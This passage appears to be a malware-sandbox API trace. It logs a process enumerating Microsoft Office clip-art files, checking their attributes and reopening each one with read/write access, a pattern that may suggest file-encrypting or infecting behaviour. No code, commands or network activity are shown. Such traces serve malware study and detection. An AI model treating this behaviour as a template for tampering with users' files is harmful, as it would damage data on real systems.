returned 0x88450 [0101.902] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0101.902] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0101.902] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0101.902] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0101.902] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0101.902] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0101.902] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0101.902] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0101.902] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0101.902] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0101.902] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0101.902] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0101.902] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0101.902] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0101.902] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0101.902] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0101.902] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0101.902] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0101.902] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0101.903] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0101.903] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0101.903] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0101.903] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0101.903] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0101.903] AreFileApisANSI () returned 1 [0101.903] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d0b0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 69 [0101.903] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8a) returned 0x8afe0 [0101.903] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d0b0, cbMultiByte=-1, lpWideCharStr=0x8afe0, cchWideChar=69 | out: lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN04385_.WMF") returned 69 [0101.903] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN04385_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\an04385_.wmf"), fInfoLevelId=0x0, lpFileInformation=0x313f6c0 | out: lpFileInformation=0x313f6c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xccaffc4, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xccaffc4, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xccd61fa, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x138c)) returned 1 [0101.903] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8afe0 | out: hHeap=0x20000) returned 1 [0101.903] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf20 | out: hHeap=0x20000) returned 1 [0101.903] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfc0 | out: hHeap=0x20000) returned 1 [0101.903] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d0b0 | out: hHeap=0x20000) returned 1 [0101.903] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0101.903] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0101.903] FindNextFileW (in: hFindFile=0x78610, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xccaffc4, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xccaffc4, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xccaffc4, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x1cd8, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="BABY_01.MID", cAlternateFileName="")) returned 1 [0101.903] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0101.903] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0101.903] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0101.903] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0101.903] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0101.903] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0101.903] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0101.903] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0101.903] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d050 [0101.903] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x35170 [0101.903] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d050 | out: hHeap=0x20000) returned 1 [0101.903] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x35170 | out: hHeap=0x20000) returned 1 [0101.903] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cfc0 [0101.903] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x35190 [0101.903] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfc0 | out: hHeap=0x20000) returned 1 [0101.904] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x35190 | out: hHeap=0x20000) returned 1 [0101.904] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0101.904] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x76110 [0101.904] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0101.904] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa6) returned 0x5f798 [0101.904] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x76110 | out: hHeap=0x20000) returned 1 [0101.904] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0101.904] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x90) returned 0x8af48 [0101.904] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5f798 | out: hHeap=0x20000) returned 1 [0101.904] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0101.904] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0101.904] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0101.904] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0101.904] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8af48 | out: hHeap=0x20000) returned 1 [0101.904] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0101.904] AreFileApisANSI () returned 1 [0101.904] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BABY_01.MID", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BABY_01.MID", lpUsedDefaultChar=0x0) returned 68 [0101.904] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d0b0 [0101.904] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0101.904] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0101.904] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d0a0 [0101.904] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfc0 [0101.904] AreFileApisANSI () returned 1 [0101.904] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d0b0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 68 [0101.904] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x88) returned 0x82a78 [0101.904] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d0b0, cbMultiByte=-1, lpWideCharStr=0x82a78, cchWideChar=68 | out: lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BABY_01.MID") returned 68 [0101.904] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BABY_01.MID" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\baby_01.mid"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x368 [0101.905] GetFileType (hFile=0x368) returned 0x1 [0101.905] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x82a78 | out: hHeap=0x20000) returned 1 [0101.905] SetFilePointerEx (in: hFile=0x368, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0101.905] SetFilePointerEx (in: hFile=0x368, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0101.905] SetFilePointerEx (in: hFile=0x368, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0101.905] CloseHandle (hObject=0x368) returned 1 [0101.906] AreFileApisANSI () returned 1 [0101.906] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d0b0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 68 [0101.906] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x88) returned 0x82cb8 [0101.906] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d0b0, cbMultiByte=-1, lpWideCharStr=0x82cb8, cchWideChar=68 | out: lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BABY_01.MID") returned 68 [0101.906] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BABY_01.MID" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\baby_01.mid"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x368 [0101.906] GetFileType (hFile=0x368) returned 0x1 [0101.906] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x82cb8 | out: hHeap=0x20000) returned 1 [0101.906] CloseHandle (hObject=0x368) returned 1 [0101.906] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0101.906] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0101.906] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0101.906] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0101.906] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0101.906] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0101.906] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0101.906] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e340 [0101.906] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e2d0 [0101.906] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df18 [0101.906] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df50 [0101.906] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df18 | out: hHeap=0x20000) returned 1 [0101.907] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e2d0 | out: hHeap=0x20000) returned 1 [0101.907] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0101.907] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e340 | out: hHeap=0x20000) returned 1 [0101.907] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df50 | out: hHeap=0x20000) returned 1 [0101.907] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0101.907] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0101.907] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0101.907] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0101.907] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0101.907] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0101.907] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0101.907] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0101.907] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0101.907] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0101.907] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0101.907] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0101.907] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0101.907] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0101.907] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0101.907] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0101.907] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0101.907] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0101.907] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0101.907] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0101.907] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0101.907] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0101.907] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0101.907] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0101.907] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0101.907] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0101.907] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0101.907] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0101.907] AreFileApisANSI () returned 1 [0101.907] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d0b0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 68 [0101.907] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x88) returned 0x82cb8 [0101.908] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d0b0, cbMultiByte=-1, lpWideCharStr=0x82cb8, cchWideChar=68 | out: lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BABY_01.MID") returned 68 [0101.908] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BABY_01.MID" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\baby_01.mid"), fInfoLevelId=0x0, lpFileInformation=0x313f6c0 | out: lpFileInformation=0x313f6c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xccaffc4, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xccaffc4, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xccaffc4, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x1cd8)) returned 1 [0101.908] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x82cb8 | out: hHeap=0x20000) returned 1 [0101.908] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfc0 | out: hHeap=0x20000) returned 1 [0101.908] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d0a0 | out: hHeap=0x20000) returned 1 [0101.908] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d0b0 | out: hHeap=0x20000) returned 1 [0101.908] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0101.908] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0101.908] FindNextFileW (in: hFindFile=0x78610, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xccaffc4, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xccaffc4, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xccaffc4, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x1306, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="BD00116_.WMF", cAlternateFileName="")) returned 1 [0101.908] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0101.908] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0101.908] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0101.908] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0101.908] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0101.908] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0101.908] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0101.908] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0101.908] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cfc0 [0101.908] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x34f90 [0101.908] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfc0 | out: hHeap=0x20000) returned 1 [0101.908] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x34f90 | out: hHeap=0x20000) returned 1 [0101.908] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d050 [0101.908] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x350b0 [0101.908] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d050 | out: hHeap=0x20000) returned 1 [0101.908] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x350b0 | out: hHeap=0x20000) returned 1 [0101.908] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0101.908] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75b70 [0101.908] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0101.908] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa6) returned 0x60088 [0101.908] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75b70 | out: hHeap=0x20000) returned 1 [0101.908] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0101.908] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x90) returned 0x8ace8 [0101.909] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x60088 | out: hHeap=0x20000) returned 1 [0101.909] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0101.909] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0101.909] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0101.909] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0101.909] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8ace8 | out: hHeap=0x20000) returned 1 [0101.909] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0101.909] AreFileApisANSI () returned 1 [0101.909] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD00116_.WMF", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD00116_.WMF", lpUsedDefaultChar=0x0) returned 69 [0101.909] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d000 [0101.909] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0101.909] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0101.909] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfc0 [0101.909] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d0a0 [0101.909] AreFileApisANSI () returned 1 [0101.909] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d000, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 69 [0101.909] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8a) returned 0x8ad80 [0101.909] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d000, cbMultiByte=-1, lpWideCharStr=0x8ad80, cchWideChar=69 | out: lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD00116_.WMF") returned 69 [0101.909] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD00116_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bd00116_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x368 [0101.910] GetFileType (hFile=0x368) returned 0x1 [0101.911] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8ad80 | out: hHeap=0x20000) returned 1 [0101.911] SetFilePointerEx (in: hFile=0x368, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0101.911] SetFilePointerEx (in: hFile=0x368, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0101.911] SetFilePointerEx (in: hFile=0x368, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0101.911] CloseHandle (hObject=0x368) returned 1 [0101.911] AreFileApisANSI () returned 1 [0101.911] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d000, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 69 [0101.911] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8a) returned 0x8a5c8 [0101.911] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d000, cbMultiByte=-1, lpWideCharStr=0x8a5c8, cchWideChar=69 | out: lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD00116_.WMF") returned 69 [0101.911] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD00116_.WMF" 